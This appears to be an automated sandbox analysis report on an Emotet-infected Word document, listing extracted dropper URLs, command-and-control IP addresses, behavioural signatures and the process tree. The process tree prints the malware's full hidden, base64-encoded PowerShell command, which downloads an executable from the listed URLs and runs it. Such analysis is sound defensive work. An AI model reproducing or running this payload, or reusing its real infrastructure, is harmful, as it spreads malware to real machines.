Analysis

  • max time kernel
    22s
  • resource
    win10v191014
  • submitted
    24-01-2020 04:06

General

  • Target

    2c4b0f8d4c1eaa6adbac77b21a05ff32242cab116fc252c21c67fc0ab51ba110.doc

  • Sample

    200124-ek582jf2v2

  • SHA256

    2c4b0f8d4c1eaa6adbac77b21a05ff32242cab116fc252c21c67fc0ab51ba110

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://wpprimebox.com/support/D03jG8Ic/

exe.dropper

http://wp.ewa-iot.com/plesk/w9v13py/

exe.dropper

http://www.astrologerpanchmukhijyotish.com/wp-includes/ucflLPxgy/

exe.dropper

https://basepresupuestos.com/fonts/aq/

exe.dropper

https://camraiz.com/wp-admin/GIrEDD/

Extracted

Family

emotet

C2

108.6.140.26:80

70.184.9.39:8080

222.144.13.169:80

45.55.65.123:8080

217.160.19.232:8080

176.9.43.37:8080

5.199.130.105:7080

202.175.121.202:8090

91.205.215.66:443

120.150.246.241:80

74.130.83.133:80

105.247.123.133:8080

190.12.119.180:443

37.187.72.193:8080

190.146.205.227:8080

200.21.90.5:443

206.189.112.148:8080

92.222.216.44:8080

24.94.237.248:80

2.237.76.249:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2c4b0f8d4c1eaa6adbac77b21a05ff32242cab116fc252c21c67fc0ab51ba110.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Checks processor information in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4988
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABPAHcAaQBpAHEAbQBwAHAAdwA9ACcASAB6AHAAYQB3AHMAZgBvAHEAJwA7ACQASgBpAGMAcABiAHkAdwBrAGEAdABxACAAPQAgACcANgA0ADgAJwA7ACQAUQBiAHgAYQBxAGkAdgBjAD0AJwBPAGIAdQByAHoAaABoAGUAegAnADsAJABNAHMAdwB3AHoAbwB1AHEAcgB6AGgAeAB1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABKAGkAYwBwAGIAeQB3AGsAYQB0AHEAKwAnAC4AZQB4AGUAJwA7ACQAWABpAGIAagB2AG4AaQBvAGMAcgBxAD0AJwBSAGcAcwBtAHoAZwBhAHAAdwBhAGwAbwAnADsAJABMAHcAZgBuAGcAYQB4AHkAcwBtAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAEUAVAAuAHcARQBCAGMATABpAGUAbgB0ADsAJABCAHoAcABtAGMAaABzAG8AZgA9ACcAaAB0AHQAcAA6AC8ALwB3AHAAcAByAGkAbQBlAGIAbwB4AC4AYwBvAG0ALwBzAHUAcABwAG8AcgB0AC8ARAAwADMAagBHADgASQBjAC8AKgBoAHQAdABwADoALwAvAHcAcAAuAGUAdwBhAC0AaQBvAHQALgBjAG8AbQAvAHAAbABlAHMAawAvAHcAOQB2ADEAMwBwAHkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAHMAdAByAG8AbABvAGcAZQByAHAAYQBuAGMAaABtAHUAawBoAGkAagB5AG8AdABpAHMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdQBjAGYAbABMAFAAeABnAHkALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGEAcwBlAHAAcgBlAHMAdQBwAHUAZQBzAHQAbwBzAC4AYwBvAG0ALwBmAG8AbgB0AHMALwBhAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBjAGEAbQByAGEAaQB6AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBHAEkAcgBFAEQARAAvACcALgAiAHMAcABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVAB5AGcAbAByAHkAbQB0AHQAPQAnAFUAdQBuAG8AaABwAHkAeQB6AGEAdABwACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAHIAdwB6AGQAaQBsAGYAdQBqAHQAcgAgAGkAbgAgACQAQgB6AHAAbQBjAGgAcwBvAGYAKQB7AHQAcgB5AHsAJABMAHcAZgBuAGcAYQB4AHkAcwBtAC4AIgBkAG8AdwBOAGwAbwBgAEEARABgAEYASQBsAEUAIgAoACQARwByAHcAegBkAGkAbABmAHUAagB0AHIALAAgACQATQBzAHcAdwB6AG8AdQBxAHIAegBoAHgAdQApADsAJABTAG0AegBhAGgAcQB1AHAAagA9ACcAVgBmAHkAZQBpAHgAbQB3AHUAZgBtACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQBzAHcAdwB6AG8AdQBxAHIAegBoAHgAdQApAC4AIgBMAGUATgBgAEcAdABIACIAIAAtAGcAZQAgADIAOQA5ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAdAAiACgAJABNAHMAdwB3AHoAbwB1AHEAcgB6AGgAeAB1ACkAOwAkAEwAbgBwAGcAZQB6AGkAbQBnAHkAbAA9ACcATQBmAHcAZQBsAHkAeQBtAGoAegB0AHIAJwA7AGIAcgBlAGEAawA7ACQAUwB6AGEAZwB6AHkAbQB3AGMAPQAnAEUAcABnAGoAegB6AHQAdgBlAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQBhAG8AYwBjAGIAbgB3AHAAYgB0AHAAbQA9ACcATABuAGcAcQBjAHIAdgBoAGoAcgBkAGsAJwA=
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    PID:3776
    • C:\Users\Admin\648.exe
      "C:\Users\Admin\648.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4772
      • C:\Users\Admin\648.exe
        --957c6398
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:4416

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4416-10-0x0000000000880000-0x0000000000895000-memory.dmp

    Filesize

    84KB

  • memory/4416-11-0x0000000000400000-0x00000000004B6000-memory.dmp

    Filesize

    728KB

  • memory/4772-8-0x00000000004C0000-0x00000000004D5000-memory.dmp

    Filesize

    84KB